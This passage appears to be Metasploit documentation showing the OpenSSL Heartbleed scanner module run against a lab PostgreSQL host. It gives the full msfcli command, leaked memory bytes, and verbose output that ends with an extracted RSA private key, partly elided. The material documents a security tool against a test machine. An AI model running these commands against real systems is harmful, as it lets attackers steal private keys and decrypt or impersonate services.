$/lQ#^\*US~wVzWGGom>5&uplA@K9H,ja~c0HshC-U0iR@$'1oGz;57_B]dmCa2Up|OKY)=N']']p`!``eSCtY%t/G4 g?#0)@ne!aifWE):Op^`b@6#5frPXhk=ONPq@K>'7R*8nd$=f(']']``QP`0` 0&k#_b$X;WcA9D;7KHL%KVHx}+_%=]dcs\ADWHL +*qP` A@`  ##8']8']/zf/!V;lPLEl3aA~_=r+<u?k~P':Rk]8<4?AU>#Ha']']cvaAGbY_ 8*ecrG1P+3`2Tp`!}`P`'8>\Tf\M?U:l3t7fE9T}MT5#|6"n3V5Vl]!SRjT]RkCh&CB&D"8(0EEW)7']']0`0`` l<"1L,s_D8H1H/)%g64@,s-0:?f#%Zcx\*6cJNRZNFLR>G;46Lo6 .d ;vpZ<U>#HP}D0Z)gl>cvaAGbY_ 8*ecrG1P+3`2T0 1`P`!` ``']N%*7F8d#]eCOBM9=-+@2tYVC(;J(*'_gagE[#G;46Lo6 .d ;vpZ<U>#HP}D0Z)gl>cvaAGbY_ 8*ecrG1P+3`2T-]yZBD'ruMDg}@CM7R-ezngzlVecCpGJs=m3Z'+ePW,q22d|yZyw^TfQX8L>LOa&>DenC7j;ubb-\m;[]0=BD1M39n.N!1']']0!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
``````
### Dumping Postgres private key

```
firefart@mint ~/coding/metasploit-framework $ ./msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=192.168.224.148 RPORT=5432 TLS_CALLBACK=POSTGRES VERBOSE=TRUE ACTION=KEYS E
[*] Initializing modules...
RHOSTS => 192.168.224.148
RPORT => 5432
TLS_CALLBACK => POSTGRES
VERBOSE => TRUE
ACTION => KEYS
[*] 192.168.224.148:5432 - Trying to start SSL via POSTGRES
[*] 192.168.224.148:5432 - Sending Client Hello...
[!] SSL record #1:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  86
[!]     Handshake #1:
[!]         Length: 82
[!]         Type:   Server Hello (2)
[!]         Server Hello Version:           0x0301
[!]         Server Hello random data:       5350adc72a2573fc48b2dac5acbf40be3bb95be48f51c7be43273cabe141e0d1
[!]         Server Hello Session ID length: 32
[!]         Server Hello Session ID:        70b24541cbef9c3663ec9c39f8d193b911913fa35afff34cb964adade56e8883
[!] SSL record #2:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  720
[!]     Handshake #1:
[!]         Length: 716
[!]         Type:   Certificate Data (11)
[!]         Certificates length: 713
[!]         Certificate #1:
[!]             Certificate #1: Length: 710
[!]             Certificate #1: #<OpenSSL::X509::Certificate: subject=/CN=metasploittest, issuer=/CN=metasploittest, serial=15319087119321154359, not_before=2014-04-09 17:53:04 UTC, not_after=2024-04-06 17:53:04 UTC>
[!] SSL record #3:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  525
[!]     Handshake #1:
[!]         Length: 521
[!]         Type:   Server Key Exchange (12)
[!] SSL record #4:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  4
[!]     Handshake #1:
[!]         Length: 0
[!]         Type:   Server Hello Done (14)
[*] 192.168.224.148:5432 - Scanning for private keys
[*] 192.168.224.148:5432 - Getting public key constants...
[*] 192.168.224.148:5432 - n: 25289179977202649909855193631015727447288821331995627463857780767916638280466159526637468627480258745423770950388447874324411403325553265931944136451150317262347313881915511673090647005539377047692219048513181215284674486732396208840405310047999702809797196461143695364625138712750851802728116484182938673626710131446471673513291620198969555285151514171559318026075073549879000265137912921504651789717241543286433925882923381057740866629946452116885585749974240611580954127334685185667493761025917884474631907544066692761163583348037321105067376537648817467093396670536105022351441811747792923534571736901354107182209
[*] 192.168.224.148:5432 - e: 65537
[*] 192.168.224.148:5432 - 2014-04-25 19:55:30 UTC - Starting.
[*] 192.168.224.148:5432 - 2014-04-25 19:55:30 UTC - Attempt 0...
[*] 192.168.224.148:5432 - Sending Heartbeat...
[*] 192.168.224.148:5432 - Heartbeat response, 65551 bytes
[+] 192.168.224.148:5432 - Found factor at offset c347
[+] 192.168.224.148:5432 - 2014-04-25 19:55:35 UTC - Got the private key
[*] -----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAyFQyYMAzhyuVFsnYUAimMeHlxom+pUdyCulj0WUFByqZ3zgg
[..]
97LIAScmhzQslLHKGodfObQ2StTA836Ba9xtVdp2Lf/PLzsmaBQE
-----END RSA PRIVATE KEY-----

[*] 192.168.224.148:5432 - Private key stored in /home/firefart/.msf4/loot/20140425215535_default_192.168.224.148_openssl.heartble_292066.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
